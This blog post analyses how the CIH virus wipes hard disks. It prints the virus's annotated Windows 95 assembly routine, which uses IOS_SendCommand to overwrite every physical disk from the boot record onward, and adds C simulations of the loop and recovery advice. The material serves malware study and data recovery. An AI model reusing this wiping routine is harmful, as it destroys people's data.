
Friday, 11 November 2011

A Complete Analysis of How CIH Destroys the Hard Disk

IOS_SendCommand is a very low-level Windows 95 VxD service, normally used for low-level operations on I/O devices: read, write, lock, format and so on. Under normal circumstances it can only be used from Ring 0 or from inside a virtual machine; calling it from an ordinary program has unpredictable consequences. The service covers many functions and is quite involved, yet it takes very few parameters: only the address of a BCB or IOR and the address of a BDD or DCB. Those few structures, however, carry a great deal of information and are themselves fairly complex. The CIH virus uses only the IOR structure. It has nearly twenty members, but the ones that matter here are IOR_func, IOR_status, IOR_flags, IOR_start_addr[2], IOR_xfer_count, IOR_buffer_ptr, IOR_req_req_handle, IOR_req_vol_handle, IOR_sgd_lin_phys, IOR_num_sgds and IOR_vol_designtr.
IOS_SendCommand is called as follows:

    mov     esi, CmdData        ; address of BCB or IOR
    mov     edi, DevData        ; address of BDD or DCB
    VxDCall IOS_SendCommand

The complete definition of IOR is:

typedef struct _IOR {
    ULONG   IOR_next;             // client link; see below
    USHORT  IOR_func;             // function; see below
    USHORT  IOR_status;           // request status; see below
    ULONG   IOR_flags;            // request flags; see below
    CMDCPLT IOR_callback;         // address of callback; see below
    ULONG   IOR_start_addr[2];    // starting address; see below
    ULONG   IOR_xfer_count;       // # of sectors/bytes; see below
    ULONG   IOR_buffer_ptr;       // client buffer; see below
    ULONG   IOR_private_client;   // BlockDev/IOS client reserved
    ULONG   IOR_private_IOS;      // reserved space for IOS
    ULONG   IOR_private_port;     // private area for port driver
    union urequestor_usage _ureq; // requestor usage; see below
    ULONG   IOR_req_req_handle;   // request handle; see below
    ULONG   IOR_req_vol_handle;   // media handle; see below
    ULONG   IOR_sgd_lin_phys;     // first physical SGD; see below
    UCHAR   IOR_num_sgds;         // number of physical SGDs
    UCHAR   IOR_vol_designtr;     // drive letter; see below
    USHORT  IOR_ios_private_1;    // reserved by IOS to force alignment
    ULONG   IOR_reserved_2[2];    // reserved for internal use
} IOR, *PIOR;
CIH first constructs an IOR and then calls IOS_SendCommand to carry out the operation the IOR specifies. In IOR_flags the virus marks the target as a physical device (IORF_PHYS_CMD) and the call as synchronous (IORF_SYNC_COMMAND), so the call returns only after the write has completed. The first write starts at position 0 (IOR_start_addr[2], i.e. cylinder 0, head 0, sector 1: the master boot record), each write covers 2048 bytes (IOR_xfer_count), the first target is the first physical hard disk (IOR_vol_designtr = 80h), and the data to write is taken from memory at 0c0001000h (IOR_buffer_ptr). That address is arbitrary: the goal is simply to spray a long run of irrelevant data onto the disk, so any address that does not point at non-existent memory will do. Finally CIH calls IOS_SendCommand, completing one write. After the call it inspects IOR_status to see whether the device responded normally; if so, it keeps writing, 2048 bytes at a time. If a whole disk has been written (unlikely) or an error occurs, it increments IOR_vol_designtr so that it points at the next physical disk. Two details of the listing below deserve attention: IOR_start_addr is never reset when the drive number changes, and "normal" is decided by comparing IOR_status with the single value 17h, which the author's own note labels IORS_NO_DEVICE. The branch structure is fixed, but which of its two outcomes corresponds to a successful write depends on what IOS actually returns here, and this page does not settle that.
The program, with annotations, follows:

; ***************************************************
; *                Kill All HardDisk                *
; ***************************************************
; *     IOR Structure of IOS_SendCommand Needs      *
; ***************************************************
; * ?? ?? ?? ?? 01 00 ?? ?? 01 05 00 40 ?? ?? ?? ?? *
; * 00 00 00 00 00 00 00 00 00 08 00 00 00 10 00 c0 *
; * ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? *
; * ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? *
; * ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 80 ?? ?? *
; ***************************************************
;
; Offset 04h: 0001h = IOR_func = IOR_WRITE
; Offset 08h: 40000501h = IOR_flags = 0100 0000 0000 0000 0000 0101 0000 0001b
;             = IORF_PHYS_CMD | IORF_VERSION_002 | IORF_SYNC_COMMAND | IORF_HIGH_PRIORITY
;             IORF_PHYS_CMD      the target is a physical device
;             IORF_SYNC_COMMAND  synchronous command (returns only once the operation has completed)
;             IORF_VERSION_002   the request is in the extended BCB (IOR) format
; Offset 10h: IOR_start_addr[2] = 00 00 00 00 00 00 00 00, the starting position, 0
;             (note: a byte offset, not a sector number)
; Offset 18h: IOR_xfer_count = 800h, write 2048 bytes
; Offset 1Ch: IOR_buffer_ptr = 0c0001000h, the data to write is taken from address 0c0001000h
; Offset 4Dh: IOR_vol_designtr = 80h, the first physical hard disk (81h is the second)

KillHardDisk:
        xor     ebx, ebx
        mov     bh, FirstKillHardDiskNumber     ; ebx = 8000h
        push    ebx                             ; -> 4Ch: IOR_num_sgds = 0, IOR_vol_designtr = 80h
        sub     esp, 2ch                        ; skip the private/requestor fields (left uninitialised)
        push    0c0001000h                      ; -> 1Ch: IOR_buffer_ptr
        mov     bh, 08h                         ; ebx = 800h
        push    ebx                             ; -> 18h: IOR_xfer_count = 800h
        push    ecx                             ; -> 14h: IOR_start_addr[1] = 0 (ecx must be 0 on entry)
        push    ecx                             ; -> 10h: IOR_start_addr[0] = 0
        push    ecx                             ; -> 0Ch: IOR_callback = 0
        push    40000501h                       ; -> 08h: IOR_flags
        inc     ecx                             ; ecx = 1
        push    ecx                             ; -> 04h: IOR_func = 0001h (IOR_WRITE), IOR_status = 0
        push    ecx                             ; -> 00h: IOR_next (don't care)

        mov     esi, esp                        ; esi -> the IOR just built
        sub     esp, 0ach
        ; The IOR (the block of bytes shown above) is built on the stack by pushing.

LoopOfKillHardDisk:
        int     20h                             ; VxDCall
        dd      00100004h                       ; VxD 0010h (IOS), service 0004h: IOS_SendCommand

        cmp     word ptr [esi+06h], 0017h       ; IOR_status == 17h? (the author reads 17h as IORS_NO_DEVICE
                                                ; yet treats it as "device normal"; see the note above)
        je      KillNextDataSection             ; yes: write the next block

ChangeNextHardDisk:
        inc     byte ptr [esi+4dh]              ; IOR_vol_designtr: next drive (80h = first physical disk, 81h = second);
                                                ; IOR_start_addr is left where it was
        jmp     LoopOfKillHardDisk              ; keep killing!!!!

KillNextDataSection:
        add     dword ptr [esi+10h], ebx        ; IOR_start_addr += 800h: next 2048-byte block
        mov     byte ptr [esi+4dh], FirstKillHardDiskNumber   ; back to the first physical disk, 80h
        jmp     LoopOfKillHardDisk              ; keep killing!!!!
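The push sequence above is easy to misread, so here is an added example (written for this page, not CIH's own code and not from the original post) that replays those pushes into a byte buffer, reads the result back through the DDK struct listed earlier, and checks it against the byte diagram and the three offsets the assembly hard-codes (esi+06h, esi+10h, esi+4dh). It also decodes the dword after int 20h. Assumptions: the struct _IOR layout exactly as listed on this page, union urequestor_usage being 20 bytes so that IOR_vol_designtr lands at 4Dh, a 32-bit CMDCPLT pointer, and ecx == 0 on entry to KillHardDisk (the zeros in the diagram only come out that way if it is).

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

typedef uint32_t ULONG; typedef uint16_t USHORT; typedef uint8_t UCHAR;
typedef uint32_t CMDCPLT;                      /* 32-bit flat callback pointer in a Win95 VxD */
union urequestor_usage { UCHAR pad[0x14]; };   /* assumed size: 40h - 2Ch, so IOR_vol_designtr is at 4Dh */

typedef struct _IOR {                /* offsets */
    ULONG   IOR_next;                /* 00h */
    USHORT  IOR_func;                /* 04h */
    USHORT  IOR_status;              /* 06h  cmp word ptr [esi+06h], 0017h */
    ULONG   IOR_flags;               /* 08h */
    CMDCPLT IOR_callback;            /* 0Ch */
    ULONG   IOR_start_addr[2];       /* 10h  add dword ptr [esi+10h], ebx */
    ULONG   IOR_xfer_count;          /* 18h */
    ULONG   IOR_buffer_ptr;          /* 1Ch */
    ULONG   IOR_private_client;      /* 20h */
    ULONG   IOR_private_IOS;         /* 24h */
    ULONG   IOR_private_port;        /* 28h */
    union urequestor_usage _ureq;    /* 2Ch */
    ULONG   IOR_req_req_handle;      /* 40h */
    ULONG   IOR_req_vol_handle;      /* 44h */
    ULONG   IOR_sgd_lin_phys;        /* 48h */
    UCHAR   IOR_num_sgds;            /* 4Ch */
    UCHAR   IOR_vol_designtr;        /* 4Dh  inc byte ptr [esi+4dh] */
    USHORT  IOR_ios_private_1;       /* 4Eh */
    ULONG   IOR_reserved_2[2];       /* 50h  (sizeof == 58h) */
} IOR;

typedef struct { uint8_t mem[512]; size_t esp; } stack_t;   /* a toy stack that grows downwards */

static void push32(stack_t *s, uint32_t v)      /* little-endian push, as the CPU does it */
{
    s->esp -= 4;
    for (int i = 0; i < 4; i++) s->mem[s->esp + i] = (uint8_t)(v >> (8 * i));
}

/* Replays the push sequence of KillHardDisk and returns esi (offset of the IOR in mem). */
static size_t build_ior(stack_t *s, uint8_t first_disk, uint32_t ecx)
{
    uint32_t ebx;
    memset(s->mem, 0xCC, sizeof s->mem);   /* CCh marks bytes never written: the "??" of the diagram */
    s->esp = sizeof s->mem - 0x20;         /* leave room above for the caller's frame */
    ebx = (uint32_t)first_disk << 8;       /* xor ebx, ebx ; mov bh, FirstKillHardDiskNumber */
    push32(s, ebx);                        /* push ebx        -> 4Ch: num_sgds = 0, vol_designtr = 80h */
    s->esp -= 0x2c;                        /* sub esp, 2ch    -> 20h..4Bh stay uninitialised */
    push32(s, 0xC0001000u);                /* push 0c0001000h -> 1Ch: IOR_buffer_ptr */
    ebx = (ebx & 0xFFFF00FFu) | 0x0800u;   /* mov bh, 08h     (ebx is now 800h) */
    push32(s, ebx);                        /* push ebx        -> 18h: IOR_xfer_count */
    push32(s, ecx);                        /* push ecx        -> 14h: IOR_start_addr[1] */
    push32(s, ecx);                        /* push ecx        -> 10h: IOR_start_addr[0] */
    push32(s, ecx);                        /* push ecx        -> 0Ch: IOR_callback */
    push32(s, 0x40000501u);                /* push 40000501h  -> 08h: IOR_flags */
    ecx++;                                 /* inc ecx */
    push32(s, ecx);                        /* push ecx        -> 04h: IOR_func = 1, IOR_status = 0 */
    push32(s, ecx);                        /* push ecx        -> 00h: IOR_next (don't care) */
    return s->esp;                         /* mov esi, esp    (sub esp, 0ach only reserves scratch below) */
}

static IOR ior_at(const stack_t *s, size_t esi)   /* copy the bytes out; no aliasing games */
{
    IOR r;
    memcpy(&r, &s->mem[esi], sizeof r);
    return r;
}

/* The C layout must agree with the offsets the assembly hard-codes. */
static int offsets_match_listing(void)
{
    return offsetof(IOR, IOR_status) == 0x06 && offsetof(IOR, IOR_start_addr) == 0x10 &&
           offsetof(IOR, IOR_vol_designtr) == 0x4d && sizeof(IOR) == 0x58;
}

/* Every fixed byte of the diagram, plus one byte from the sub esp,2ch hole. */
static int ior_matches_diagram(void)
{
    stack_t s;
    size_t esi = build_ior(&s, 0x80, 0);
    IOR r = ior_at(&s, esi);
    return r.IOR_func == 0x0001 && r.IOR_status == 0 && r.IOR_flags == 0x40000501u &&
           r.IOR_start_addr[0] == 0 && r.IOR_start_addr[1] == 0 &&
           r.IOR_xfer_count == 0x800 && r.IOR_buffer_ptr == 0xC0001000u &&
           r.IOR_num_sgds == 0 && r.IOR_vol_designtr == 0x80 && s.mem[esi + 0x20] == 0xCC;
}

/* "int 20h ; dd NNNNNNNNh" is a VxDCall: high word = VxD ID, low word = service number. */
static unsigned vxd_id(uint32_t dw)      { return dw >> 16; }
static unsigned vxd_service(uint32_t dw) { return dw & 0xFFFFu; }

int main(void)
{
    stack_t s;
    size_t esi = build_ior(&s, 0x80, 0);
    printf("dd 00100004h -> VxD %02Xh, service %u\n", vxd_id(0x00100004u), vxd_service(0x00100004u));
    for (size_t off = 0; off < sizeof(IOR); off++) {           /* regenerate the byte diagram */
        if (s.mem[esi + off] == 0xCC) printf("?? "); else printf("%02x ", s.mem[esi + off]);
        if (off % 16 == 15) putchar('\n');
    }
    putchar('\n');
    return 0;
}
```

Running it prints the same rows as the diagram in the comment header, with 00 where the diagram shows ?? for the callback slot (the listing really does push a zero there). The point of the offset check is that the assembly addresses the IOR by raw displacement; if the DDK structure were a different size (for instance a different union urequestor_usage), the write to esi+4dh would land somewhere other than the drive number.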

When CIH triggers, it first destroys the flash memory and only then the hard disk. Some machines hang completely once the flash memory has been destroyed. If that is what happened to you, congratulations: your hard disk will not have suffered much. The flash memory holds very important code and data, namely the BIOS, so once it is destroyed there is a good chance the machine dies completely; and if the machine has hung, the virus very likely never reaches the disk-killing module, or runs it only briefly before everything freezes, so your disk can quite possibly be recovered. If, however, the virus runs smoothly, it writes the disk 2048 bytes at a time as the program above shows, starting from the master boot record and continuing through the partition boot sector, the file allocation table, the root directory and the data area until the whole disk has been written, and then it starts on the second physical disk. Dark enough? But this is only the ideal case from the virus's point of view; writing 2048 bytes at a time is fairly slow after all. On an ordinary disk of a gigabyte or more a cylinder has 63 sectors, so even the 63 sectors of cylinder 0, head 0, where the MBR lives, take some time to overwrite. As the writing goes on it destroys file data that Win95 needs in order to keep running, the machine most likely crashes, and at that point the vast majority of people press Reset. If so, a considerable part of your disk data has probably survived. That is the real reason a disk damaged by CIH can sometimes be repaired with software. But do not imagine that those tools are powerful enough to repair every disk: if too much of the disk's critical data is lost, nobody can help. The probability of recovery therefore depends largely on how quickly you shut the machine down after the virus triggered: the shorter the time, the less data lost and the better the odds. If only the master boot record was overwritten, recovery is as good as certain. If the partition boot sector was overwritten, the odds are about 99%. If the root directory was overwritten, recovery is possible but has to be done by hand. If the file allocation table was overwritten, repair is nearly impossible. And if the data area was overwritten, there is no hope at all. The real situation is somewhat more complicated than this; typically the loss is sequential.
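To make the recovery window concrete, here is an added example (written for this page; not CIH's code and not part of the original post) that runs the LoopOfKillHardDisk logic against constructed, in-memory "disks" and reports which structures are gone after how many IOS_SendCommand calls. The branch in the listing is unambiguous (status equals 17h: next block and back to drive 80h; anything else: same block, next drive number), but the page gives two readings of what 17h means, so the model takes the status codes as parameters and shows what each reading implies for a two-disk machine. Assumptions: 512-byte sectors and 63 sectors per track as in the text, the partition boot sector at LBA 63, two 1 MiB disks, and the non-17h status values, which are constructed; only whether a value equals 17h matters to the loop.

```c
#include <stdint.h>
#include <stdio.h>

#define SECTOR      512u
#define BLOCK       0x800u        /* IOR_xfer_count: 2048 bytes per IOS_SendCommand */
#define FIRST_DISK  0x80u         /* FirstKillHardDiskNumber */
#define CONTINUE    0x0017u       /* the value cmp word ptr [esi+06h] tests for */
#define MAX_DISKS   8

/* What the stand-in IOS returns for a good write, a non-existent drive, and a write past the end. */
typedef struct { unsigned ok, no_device, past_end; } status_model_t;
/* Reading 1, the page's prose: 17h is what a successful write returns.                         */
static const status_model_t model_author   = { 0x0017u, 0x0100u, 0x0100u };
/* Reading 2, the constant the page's note names (IORS_NO_DEVICE): 17h comes back only for a
 * drive number that does not exist. The other two values are assumed; only "not 17h" matters.  */
static const status_model_t model_nodevice = { 0x0001u, 0x0017u, 0x0100u };

typedef struct { uint64_t size, hi; } disk_t;            /* hi: high-water mark of bytes overwritten */
typedef struct { uint8_t vol; uint64_t start; } ior_t;   /* IOR_vol_designtr, IOR_start_addr (bytes) */

static const uint64_t two_disks[2] = { 1u << 20, 1u << 20 };   /* constructed: two 1 MiB disks */

/* Stand-in for IOS_SendCommand with IOR_func = IOR_WRITE. */
static unsigned fake_send_command(disk_t *d, int n, const status_model_t *m, const ior_t *ior)
{
    int i = (int)ior->vol - (int)FIRST_DISK;
    if (i < 0 || i >= n) return m->no_device;
    if (ior->start + BLOCK > d[i].size) return m->past_end;
    if (ior->start + BLOCK > d[i].hi) d[i].hi = ior->start + BLOCK;
    return m->ok;
}

/* One iteration of LoopOfKillHardDisk: the VxD call and the branch that follows it. */
static void kill_step(ior_t *ior, disk_t *d, int n, const status_model_t *m)
{
    if (fake_send_command(d, n, m, ior) == CONTINUE) {   /* je KillNextDataSection */
        ior->start += BLOCK;        /* add dword ptr [esi+10h], ebx   (ebx = 800h) */
        ior->vol = FIRST_DISK;      /* mov byte ptr [esi+4dh], FirstKillHardDiskNumber */
    } else {                        /* ChangeNextHardDisk */
        ior->vol++;                 /* inc byte ptr [esi+4dh]: wraps at FFh like the real byte */
    }
}

static int setup(disk_t *d, const uint64_t *sizes, int n)
{
    if (n > MAX_DISKS) n = MAX_DISKS;
    for (int i = 0; i < n; i++) { d[i].size = sizes[i]; d[i].hi = 0; }
    return n;
}

/* Bytes of disk k overwritten after `calls` iterations. */
static uint64_t overwritten_after(unsigned calls, const status_model_t *m, const uint64_t *sizes, int n, int k)
{
    disk_t d[MAX_DISKS];
    ior_t ior = { FIRST_DISK, 0 };
    n = setup(d, sizes, n);
    for (unsigned c = 0; c < calls; c++) kill_step(&ior, d, n, m);
    return d[k].hi;
}

/* Iterations before byte `target` of drive 80h is overwritten (0 if not within max_calls). */
static unsigned calls_to_reach(uint64_t target, const status_model_t *m, const uint64_t *sizes, int n, unsigned max_calls)
{
    disk_t d[MAX_DISKS];
    ior_t ior = { FIRST_DISK, 0 };
    n = setup(d, sizes, n);
    for (unsigned c = 1; c <= max_calls; c++) {
        kill_step(&ior, d, n, m);
        if (d[0].hi > target) return c;
    }
    return 0;
}

int main(void)
{
    printf("MBR overwritten after %u (reading 1) / %u (reading 2) calls\n",
           calls_to_reach(0, &model_author, two_disks, 2, 1000),
           calls_to_reach(0, &model_nodevice, two_disks, 2, 1000));
    printf("partition boot sector at LBA 63 after %u / %u calls\n",
           calls_to_reach(63 * SECTOR, &model_author, two_disks, 2, 1000),
           calls_to_reach(63 * SECTOR, &model_nodevice, two_disks, 2, 1000));
    printf("after 300 calls, reading 1: %llu bytes of 80h, %llu of 81h\n",
           (unsigned long long)overwritten_after(300, &model_author, two_disks, 2, 0),
           (unsigned long long)overwritten_after(300, &model_author, two_disks, 2, 1));
    printf("after 300 calls, reading 2: %llu bytes of 80h, %llu of 81h\n",
           (unsigned long long)overwritten_after(300, &model_nodevice, two_disks, 2, 0),
           (unsigned long long)overwritten_after(300, &model_nodevice, two_disks, 2, 1));
    return 0;
}
```

Under either reading the MBR is gone after the very first call and the partition boot sector after 16 calls (reading 1) or 46 calls (reading 2), which is why the text's advice to power off immediately is the only thing that helps. The two readings diverge on how the second disk is treated: under reading 1 the loop marches through drive 80h alone and, because IOR_start_addr is never reset, it then cycles through drive numbers at an offset past the end of an equal-sized drive 81h without ever writing it; under reading 2 every 2048-byte block is written to 80h, then 81h, then the non-existent 82h returns 17h and the offset advances, so both disks are destroyed in lockstep.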
To sum up: CIH's damage to the hard disk is logical damage, and it is extremely destructive; once it has struck, the chances of repair are small. If it triggers, restart or power off as quickly as you can to keep the loss to a minimum. One more word of advice: never compile and run the program above unless you are quite sure of what you are doing, because the consequences would be very serious. In fact the same effect can be had with a few lines in DOS Debug, so why bother with a VxD call under Windows 95? And please do not bring me your hard disk to repair: I am working on my graduation project and extremely busy. Writing this article has already worn me out. It was done for the many CIH victims and for those comrades who need to understand this area. Remember: never, ever do it!
